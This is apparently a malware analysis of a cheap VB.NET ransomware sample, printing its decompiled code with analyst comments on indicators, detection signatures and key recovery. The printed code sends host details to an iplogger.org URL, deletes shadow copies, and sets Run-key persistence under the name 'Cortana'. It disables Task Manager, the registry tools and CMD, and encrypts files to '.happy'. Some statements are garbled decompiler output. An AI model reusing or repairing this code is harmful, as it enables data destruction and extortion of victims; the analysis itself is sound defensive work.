I personally think this is a rather cheap piece of VB.NET/C# ransomware.
Part of the code (it appears to be decompiler output, so some statements are garbled):
Private Sub EndOf()
' EndOf: final stage as shown in this excerpt. It drops the ransom note, sends one
' HTTP request that carries host details, waits, and then ends the process.
' NOTE(review): the listing looks like decompiler output; the User-Agent statements
' below are garbled and do not compile as shown.
'
' Ransom note written to the user's Desktop; the text comes from an embedded resource.
' The file name "HIT BY RANSOMWARE.txt" is a host indicator.
System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
' NOTE(review): in the next three calls the path argument is the directory itself
' (userprofile / appdata / programdata) with no file name appended. Either the
' decompiler dropped a suffix or these calls fail at run time - confirm against the sample.
System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
Dim webclient1 As System.Net.WebClient = New System.Net.WebClient()
Try
' Garbled decompilation. Read as a whole, the statements below appear to fill a
' 10-element String array and assign the joined result to the "User-Agent" header:
'   Name=<user name>; OS=<OS full name>; RAM=<total physical memory / 1073741824,
'   rounded to 2 places>; Time=<DateTime.Now>; Encrypted Files=<Me.i>
' Detection: an outbound request whose User-Agent starts with "Name=" and contains
' "; Encrypted Files=" is a usable proxy/IDS signature.
webclient1.Headers
"User-Agent"
New String(9) {}
New String(9) {}(0) = "Name="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="
New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString()
' One request to a URL on a third-party IP-logging service; the returned data is not
' used. The host details travel only in the User-Agent header built above, and no
' key material is included in the fields visible in this excerpt. The URL is a
' network indicator for proxy and DNS log searches.
webclient1.DownloadData("https://iplogger.org/21zut")
Finally
If (webclient1 Is Not Nothing) Then
webclient1.Dispose()
End If
End Try
' 15 second pause, then the process terminates itself.
System.Threading.Thread.Sleep(15000)
ProjectData.EndApp()
End Sub
' Regs: recovery inhibition, persistence and tool lock-out, as far as this excerpt shows.
' Each action below leaves an artifact that process-creation or registry auditing can catch.
Private Sub Regs()
' Garbled decompilation. The recoverable content is two hidden process launches:
'   1. wmic.exe with arguments "shadowcopy delete" - removes Volume Shadow Copies,
'      i.e. the local restore points a victim would otherwise use for recovery.
'   2. cmd.exe running "takeown /f" against a path under %systemroot%; the exact
'      path cannot be recovered from the garbled string literal.
' Detection: process creation of wmic.exe with "shadowcopy delete" on the command
' line, and cmd.exe spawning takeown against the Windows directory.
New Process()
New Process().StartInfo.FileName = "wmic.exe"
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete"
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start()
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe"
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose()
' All registry writes share one Try block and the Catch only records the error, so the
' first write that fails skips every write after it. Triage note: missing values on
' a host therefore do not rule out execution.
Try
' Persistence: HKLM Run value named "Cortana" pointing at the running executable.
' The value name is that of a Windows component, presumably chosen to blend in.
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location)
' Machine-wide policy values: Task Manager and registry editing tools disabled.
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer))
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer))
' Windows Script Host switched off machine-wide (Enabled = 0).
Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
' Same lock-outs repeated for the current user, plus DisableCMD = 1 under
' HKCU\SOFTWARE\Policies\Microsoft\Windows\System (the subkey is created if absent).
Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer))
Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer))
Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
Catch exception1 As Exception
' Error is recorded through the VB runtime helper and otherwise ignored.
ProjectData.SetProjectError(exception1)
End Try
End Sub
' EnCrypt: symmetric encryption of a byte buffer with a key derived from a string.
'   input - bytes to encrypt
'   key   - string that is ASCII-encoded and hashed with SHA-256 to form the cipher key
' Returns the encrypted bytes, or Nothing if any step throws.
' Analyst notes:
'   - The key is a plain SHA-256 of the string; no salt, iteration count or random
'     component is visible, so anyone who knows the string can recompute the key.
'   - The mode is ECB and no IV is set, so identical plaintext blocks produce identical
'     ciphertext blocks within and across files encrypted under the same key.
Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte()
Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged()
Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng()
Try
rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key))
rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB
' NOTE(review): the next two statements are garbled by the decompiler (array2 is used
' in its own initializer, and an encryptor object is returned from a Byte() function).
' Presumably the original applied TransformFinalBlock over the whole input using the
' encryptor from CreateEncryptor() - confirm against the sample.
Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, array2.Length())
Return rijndaelmanaged1.CreateEncryptor()
Catch exception1 As Exception
' Failure is recorded through the VB runtime helper; the caller receives Nothing.
ProjectData.SetProjectError(exception1)
End Try
Return Nothing
End Function
' EncryptDirectory: walks every file under path (recursively) and, per file, overwrites
' the content with EnCrypt output, appends the ".happy" extension, and increments the
' counter Me.i.
'   path - root directory to process
' Analyst notes:
'   - The per-file key string is the decimal text of (Me.i + 1) followed by a constant
'     that is hardcoded in the binary. Nothing random or victim-specific enters the key
'     in this excerpt, so the keys can be recomputed from the sample. Recovery tooling
'     needs the order in which files were processed and the starting value of Me.i,
'     which is not shown here.
'   - Host indicators: files renamed to "<original name>.happy".
Private Sub EncryptDirectory(ByVal path As String)
Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories)
Dim num1 As Integer = 0
Do While (num1 < array1.Length())
Dim str1 As String = array1(num1)
Try
' The whole file is read into memory, encrypted, and written back to the same path.
System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg"))
T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy")
' The counter advances only after both the write and the rename succeed. If the rename
' fails after a successful write, the file is encrypted without the ".happy" extension
' and the next file reuses the same counter value - relevant when rebuilding keys.
Me.i = (Me.i + 1)
Catch exception1 As Exception
' Errors are silently ignored; the loop continues with the next file.
End Try
num1 = (num1 + 1)
Loop
End Sub